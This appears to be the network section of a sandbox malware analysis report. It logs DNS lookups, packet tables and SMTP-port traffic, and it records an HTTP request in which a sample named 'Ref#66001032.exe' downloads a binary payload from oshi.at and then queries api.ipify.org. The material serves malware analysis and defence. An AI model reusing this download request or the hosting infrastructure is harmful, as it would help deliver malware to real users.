                                                                                                Jan 6, 2025 07:56:58.362560987 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.362602949 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.362607956 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.362621069 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.362643957 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.362684965 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.362770081 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.362832069 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.362863064 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.362868071 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.362962008 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.440269947 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.440340996 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.440502882 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.440537930 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.440552950 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.440565109 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.440578938 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.440593004 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.440601110 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.440604925 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.440661907 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.440784931 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.440833092 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.440850019 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.440896034 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.441024065 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.441076040 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.441076994 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.441087961 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.441111088 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.441386938 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.441427946 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.441431999 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.441441059 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.441469908 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.441503048 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:15.855175018 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:15.855375051 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:15.860219002 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:16.026880026 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:16.027561903 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:16.027637959 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:16.027671099 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:16.027684927 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:16.032468081 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:16.032478094 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:16.032597065 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:16.032607079 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:16.320450068 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:16.487296104 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:23.482470036 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:23.482516050 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:23.483053923 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:23.487740040 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:23.487759113 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:24.274157047 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:24.274344921 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:24.281001091 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:24.281014919 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:24.281233072 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:24.338929892 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:24.383336067 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.049509048 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.049537897 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.049597979 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.049624920 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.049719095 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.050245047 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.050287008 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.050295115 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.050299883 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.050348997 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.130618095 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.130686998 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.136051893 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.136132002 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.136137009 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.136147022 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.136192083 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.259572029 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.467338085 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.467413902 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.489171982 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.489212036 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.489279032 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.489362001 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.489377022 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.489419937 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.489976883 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.490031004 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.490839958 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.490864992 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.490895987 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.490900993 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.490923882 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.491667032 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.491688967 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.491724968 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.491729975 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.491755962 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.491780996 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.629504919 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.629591942 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.629720926 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.629761934 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.629865885 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.629873037 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.629901886 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.630414963 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.630455971 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.630460978 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.631252050 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.631284952 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.631304026 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.631308079 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.631326914 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.690483093 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.762830973 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.762844086 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.762923956 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.763403893 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763411045 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763458967 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763475895 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.763483047 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763499975 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.763865948 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763927937 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763955116 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763978958 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.763983011 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763999939 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.876998901 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877058029 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.877074957 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877409935 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877456903 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.877464056 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877680063 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877717018 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877722025 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.877724886 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877753019 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877762079 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.878321886 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.878350019 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.878366947 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.878371954 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.878392935 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.878417015 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.880326033 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.880386114 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.880603075 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.880650997 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.880939007 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.880980968 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.881387949 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.881442070 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.881448030 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.881455898 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.881481886 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.881496906 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.881501913 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.881539106 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.990653992 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.990727901 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.990772009 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.990773916 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.990787029 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.990850925 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.991071939 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.991122007 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.991362095 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.991429090 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.991446972 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.991453886 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.991496086 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.039414883 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.110186100 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.110270977 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.110287905 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.110344887 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.110529900 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.110584974 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.110919952 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.110951900 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.110970974 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.110976934 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.110986948 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.111011982 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.111057043 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.111062050 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.175436020 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.238365889 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.238387108 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.238451004 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.238460064 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.238480091 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.238496065 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.238502979 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.238511086 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.238514900 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.238543987 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.238549948 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.238594055 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.238598108 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.238759041 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:26.239099026 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:26.239152908 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:58:45.060492992 CET61113443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:58:45.112984896 CET61113443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:58:50.569155931 CET443611135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:58:50.628613949 CET61113443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:58:54.316416979 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:58:54.321314096 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:58:54.488742113 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:58:54.488791943 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:58:54.489063025 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:58:54.489063025 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:58:54.493900061 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:58:54.848072052 CET61113443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:58:54.848187923 CET443611135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:58:54.848252058 CET61113443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:58:54.850438118 CET61114443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:58:54.850490093 CET443611145.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:58:54.850548983 CET61114443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:58:54.850927114 CET61114443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:58:54.850939035 CET443611145.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:58:55.641521931 CET443611145.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:58:55.641635895 CET61114443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:58:55.646486998 CET61114443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:58:55.646506071 CET443611145.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:58:55.646789074 CET443611145.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:58:55.650901079 CET61114443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:58:55.695333958 CET443611145.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:00.191867113 CET61114443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:00.191970110 CET443611145.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:00.192090988 CET61114443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:00.193279982 CET61115443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:00.193298101 CET443611155.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:00.193572044 CET61115443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:00.194518089 CET61115443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:00.194531918 CET443611155.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:00.993820906 CET443611155.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:00.993904114 CET61115443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:00.996454000 CET61115443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:00.996464014 CET443611155.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:00.996694088 CET443611155.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:01.002536058 CET61115443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:01.047333002 CET443611155.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:04.099381924 CET61115443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:04.099384069 CET61116443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:04.099435091 CET443611165.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:04.099499941 CET443611155.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:04.099638939 CET61115443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:04.099638939 CET61116443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:04.099944115 CET61116443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:04.099966049 CET443611165.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:04.940628052 CET443611165.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:04.940696001 CET61116443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:04.943464041 CET61116443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:04.943475962 CET443611165.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:04.943685055 CET443611165.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:04.945769072 CET61116443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:04.991332054 CET443611165.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:08.089108944 CET61116443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.089202881 CET443611165.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:08.089361906 CET61116443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.089692116 CET61117443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.089723110 CET443611175.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:08.092678070 CET61117443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.092844963 CET61117443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.092856884 CET443611175.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:08.923820972 CET443611175.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:08.924057961 CET61117443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.925913095 CET61117443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.925924063 CET443611175.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:08.926163912 CET443611175.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:08.927457094 CET61117443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.975332022 CET443611175.253.86.15192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 6, 2025 07:54:59.611114979 CET | 59636 | 53 | 192.168.2.6 | 1.1.1.1
Jan 6, 2025 07:54:59.626437902 CET | 53 | 59636 | 1.1.1.1 | 192.168.2.6
Jan 6, 2025 07:55:16.228774071 CET | 53 | 63468 | 1.1.1.1 | 192.168.2.6
Jan 6, 2025 07:55:17.617988110 CET | 53 | 62983 | 1.1.1.1 | 192.168.2.6
Jan 6, 2025 07:57:12.803147078 CET | 62766 | 53 | 192.168.2.6 | 1.1.1.1
Jan 6, 2025 07:57:12.810350895 CET | 53 | 62766 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 6, 2025 07:54:59.611114979 CET | 192.168.2.6 | 1.1.1.1 | 0x302d | Standard query (0) | oshi.at | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:57:12.803147078 CET | 192.168.2.6 | 1.1.1.1 | 0x9987 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 6, 2025 07:54:59.626437902 CET | 1.1.1.1 | 192.168.2.6 | 0x302d | No error (0) | oshi.at |  | 5.253.86.15 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:54:59.626437902 CET | 1.1.1.1 | 192.168.2.6 | 0x302d | No error (0) | oshi.at |  | 194.15.112.248 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:55:05.545063972 CET | 1.1.1.1 | 192.168.2.6 | 0xda75 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 07:55:05.545063972 CET | 1.1.1.1 | 192.168.2.6 | 0xda75 | No error (0) | s-part-0017.t-0009.t-msedge.net |  | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:57:12.810350895 CET | 1.1.1.1 | 192.168.2.6 | 0x9987 | No error (0) | api.ipify.org |  | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:57:12.810350895 CET | 1.1.1.1 | 192.168.2.6 | 0x9987 | No error (0) | api.ipify.org |  | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:57:12.810350895 CET | 1.1.1.1 | 192.168.2.6 | 0x9987 | No error (0) | api.ipify.org |  | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:58:21.144951105 CET | 1.1.1.1 | 192.168.2.6 | 0x70c2 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 07:58:21.144951105 CET | 1.1.1.1 | 192.168.2.6 | 0x70c2 | No error (0) | s-part-0017.t-0009.t-msedge.net |  | 13.107.246.45 | A (IP address) | IN (0x0001) | false
                                                                                                • oshi.at
                                                                                                • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49713 | 5.253.86.15 | 443 | 2736 | C:\Users\user\Desktop\Ref#66001032.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:55:00 UTC | 186 | OUT | GET /YBbz HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: oshi.at
Connection: Keep-Alive
2025-01-06 06:55:35 UTC | 317 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Jan 2025 06:55:35 GMT
Content-Type: application/octet-stream
Content-Length: 1223688
Connection: close
Accept-Ranges: bytes
Last-Modified: Sun, 05 Jan 2025 23:17:21 GMT
Content-Disposition: attachment; filename=AXGP.dat
ETag: "a6db55e686be5ecbf68d759d0c4a9c0f"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 61089 | 5.253.86.15 | 443 | 2736 | C:\Users\user\Desktop\Ref#66001032.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:56:14 UTC | 162 | OUT | GET /YBbz HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: oshi.at


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
